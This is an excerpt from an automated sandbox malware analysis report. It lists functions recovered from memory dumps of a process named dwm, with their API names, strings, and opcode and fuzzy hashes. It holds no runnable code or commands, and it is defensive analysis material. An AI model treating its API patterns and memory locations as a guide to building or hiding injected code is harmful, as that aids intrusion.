                                                    • Instruction ID: 19fb92aaf78f41d8746bab5670984fd717bba40a5ce84c49154aa1bf7feed7f0
                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                    • Instruction Fuzzy Hash: D7118432F0028C82FA6497359D5D33922427F547FCF964724A83A877DEEE6BC8028680
                                                    Function 0000026DB16E199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 517849248-0
                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                    • Instruction ID: 6cc60bab3edfc80ab0bf1b1b68102f51cc74f53e0a5f456eeb292763ac526ea5
                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                    • Instruction Fuzzy Hash: 61018C32B00A4882EB20DB56F84C75963A1F798FC9F894035DE4A43758DF3EC989C780
                                                    Function 0000026DB16E36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                    • String ID:
                                                    • API String ID: 449555515-0
                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                    • Instruction ID: 7a58fe53f2c8d22241571f4ee77b4899069a8e2b6000b037f786f85d33186c39
                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                    • Instruction Fuzzy Hash: 8B011776F11B48C2EF259B21EC0D72A73B0BB59B8AF560528CA4907768EF3EC548C744
                                                    Function 0000026DB16E8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                    • Instruction ID: 09fae56c56ed387303c8764d6db5e1c04d0039bc279674bda1e0c5e917479ea9
                                                    • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                    • Instruction Fuzzy Hash: 6451D433B0160886EB14CF25EC4CB9937A5FB54B8DF928628DE164778CEB36C841C780
                                                    Function 0000026DB16E1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: FinalHandleNamePathlstrlen
                                                    • String ID: \\?\
                                                    • API String ID: 2719912262-4282027825
                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                    • Instruction ID: 23101e8bac732e14f1f7b23abeb2240bfd7bcae22aa721ee4eea136ba59ce63b
                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                    • Instruction Fuzzy Hash: 5BF03C72B0464992EB708B25ED8876967A0F758B8CF954120DA4946958DB2ECA8DCB40
                                                    Function 0000026DB16E3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CombinePath
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3422762182-91387939
                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                    • Instruction ID: c26758ff0396199c07dc873be3bb7d8537b3b0c9a212a891960d10243fb781fa
                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                    • Instruction Fuzzy Hash: 52F05832F04B8882EA008B12BD081196760FB58FC8F4AA120EE4A47B1CDE29C5458780
                                                    Function 0000026DB16EBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                    • Instruction ID: 429267d0d4446d2fa5feb1fb43cab21f32682641f020887267ec9897f448af08
                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                    • Instruction Fuzzy Hash: 25F06272F1560981EB148B24EC4C3596361FB94B69F650319CA6A452ECDF2EC044C380
                                                    Function 0000026DB16E5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                    • Instruction ID: 2ff85500d4778eea871bccd8e4c794abedc98d614342fbc254242d8744c277fd
                                                    • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                    • Instruction Fuzzy Hash: D161BD77A19B48C6EB60CB15E84831A77E0F389798F521219EA8E47BACDB7DC550CF40
                                                    Function 0000026DB16C3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction ID: 897877ffb62d39bad589201e0bbdad8bebd556c484760ff332f556d3a199dc08
                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction Fuzzy Hash: A911E932F6CE1911FAA43529EC4E36911806B7937CFCB8639A976073DECE26CB4142C1
                                                    Function 0000026DB16F4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction ID: 5096fa46805db0d5eba7118a4900e8f07be5155d5b92be9b16789ee7642a16da
                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction Fuzzy Hash: 0F117032F18A5D21F7649568ECDE37913416B793BDF1B0634A97607FEECB2AC8458280
                                                    Function 0000026DB16BF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                    • API String ID: 3215553584-4202648911
                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                    • Instruction ID: abde3a52cf4df3080423dc425faff293e626ad9533eb1817800e0ec5b1554162
                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                    • Instruction Fuzzy Hash: AA61E336F0024C46FA699B69ED5E32B6AA1E78674CF538855CA0A177BCDB37C941C380
                                                    Function 0000026DB16EAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction ID: affc87684284764a2ab0774d118326dc4b9f70f2fc1dd7146b6941827c64332f
                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction Fuzzy Hash: DA614633B00B88CAEB20DF69D8843AD77A0F758B8CF554216EE4957B98DB39C595C780
                                                    Function 0000026DB16BA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction ID: d7f660fa681c8cb93fbc710d1c7bf19647c34010a799980539e68d54f452ef8a
                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction Fuzzy Hash: A651B132B00288CAEB748F15984A35E77A0F355B8CF1A8216DB89C7BDDCB7AD450C780
                                                    Function 0000026DB16EAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction ID: f613ccf04dfa6579a3ca04c1ed712572304a526b62d5fc1af6f29e4bff97c205
                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction Fuzzy Hash: BB51B673B00388CAEB748F15988835977A0F754B8DF9A8315DA5987BDDCB36D451C780
                                                    Function 0000026DB16B8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 3242871069-629598281
                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction ID: 62fc8aa2e8d62d1c1b5938075618f77f3d2e8a678a9615712a2b1111db10df72
                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction Fuzzy Hash: 9A51DE33B122088AEB95DF15EC49B5A3799F358B9CF628124DA064378CEB36DC41C784
                                                    Function 0000026DB16B83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 3242871069-629598281
                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction ID: 34418acd86f7283396d162ee48b82010f6baf6343cfd6370cfc2196a288a63e7
                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction Fuzzy Hash: 7131AE32B0174896EB55EF11EC49B5A77A8F348B9CF268018EE5B0778DDB3AD940C784
                                                    Function 0000026DB16F2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                    • Instruction ID: 000751ae4728074a4d4770e16d66dfcd18980676af8fb22edeb76422ba5434ab
                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                    • Instruction Fuzzy Hash: 8ED1F172F15A8889E711CFB9D84839C3BB1F35479CF11821ACE5997B9DDA3AC406CB80
                                                    Function 0000026DB16E14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free
                                                    • String ID:
                                                    • API String ID: 3168794593-0
                                                    • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                    • Instruction ID: 1b63bda7a3b2f64073a224fc9e68673fad4f203e94f10cdb9c056bd16c43cb3a
                                                    • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                    • Instruction Fuzzy Hash: B1015A32E05B98C6E704DF6AED0814A77A0F799F8AF064425EA4A43729DE39C051C780
                                                    Function 0000026DB16F2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                    • Instruction ID: 2914282608597c0e54373ae9373649dc6f4af84410f1f8e1c7ccd05fc9b06805
                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                    • Instruction Fuzzy Hash: 8191BE72F0065C85F761DF699C883AD2BA0F754B8CF56410DDE0A67A9CDB36C886CB80
                                                    Function 0000026DB16E7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                    • Instruction ID: 56a4de870c5bf82cc91a9eb2bf3fb88f08382fb6015aca4a7eec940d2ada81fe
                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                    • Instruction Fuzzy Hash: F811FE36F10F0589EB00CF64EC593A833A4F75975DF451E25EA6D477A8DB79C1988380
                                                    Function 0000026DB16E253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3081899298-91387939
                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                    • Instruction ID: 186c736daf2fe598c8f0eeee440fc03c42f5a87af06a7fb27e0c6c1a3c51c029
                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                    • Instruction Fuzzy Hash: 4571D537B0078986EB25DF25DC483BA6796F389B88F96021ADD0953B8DDF36C645C780
                                                    Function 0000026DB16B9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CallTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3163161869-2084237596
                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction ID: 343f8ed96ae9e255e8d6cc2e5d8b0d50d6fabb5b2d693b9dd6750b7c6467db44
                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction Fuzzy Hash: D8616672B00B888AEB20DF65D88539E7BA4F748B8CF154215EF4917B9CDB3AD195C780
                                                    Function 0000026DB16E2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3081899298-91387939
                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                    • Instruction ID: 6081d9515b78a5451c3b01ca0690ced654a88f6cdfecc5717a5d15d63774d113
                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                    • Instruction Fuzzy Hash: B851C533B0478981E6649F29E95C37A6762F389B48FC60219DD5A03B5DDA3BC545C7C0
                                                    Function 0000026DB16F26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                    • Instruction ID: 2ec58ab312a6c0d7bc6c490af664c8f235b82b1d44ca5cb993bdbc287e18f75c
                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                    • Instruction Fuzzy Hash: CF41C672B14B8486DB20CF25E8483AA77A0F798798F524125EE4D8779CEB7DC445CB80
                                                    Function 0000026DB16E94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                    • Instruction ID: eb3548c1724dcde9df2a71e12e6636971bf1ace67d4ebaf1e65b0598e90257b4
                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                    • Instruction Fuzzy Hash: 60112B37A15B8482EB618B15E84435977E5FB88B98F594220EE8C0776CEF3DC551CB40
                                                    Function 0000026DB16B7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: __std_exception_copy
                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                    • API String ID: 592178966-758928094
                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                    • Instruction ID: e81a0fd9307df53571b6e59f4c20a16d81c27b650d2d79f6339a629951941710
                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                    • Instruction Fuzzy Hash: E2E08671B50B8890DF019F21EC442D833A4DB59B68B999122995C07315FA38D1F9C340
                                                    Function 0000026DB16B73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: __std_exception_copy
                                                    • String ID: Locator'$riptor at (
                                                    • API String ID: 592178966-4215709766
                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                    • Instruction ID: f549a2e2c9ef67f85f6a1f207eef1fe50030ba0852928ba2ffb427da96e57b4b
                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                    • Instruction Fuzzy Hash: 4CE08671B10B4880DF019F21DC441D87364E759B58F899122C94C07315EA38D1E5C340
                                                    Function 0000026DB16E1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID:
                                                    • API String ID: 756756679-0
                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                    • Instruction ID: a1c2de38aed7fd68c3dd603d9b4bc3b7c7c8e68a9cd9c699eb74f3e143d02837
                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                    • Instruction Fuzzy Hash: 67118236F01B48C1EA44DB6AE80C26973A1F789FC9F594125DE4D83769DE3AD452D380
                                                    Function 0000026DB16E1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1617791916-0
                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
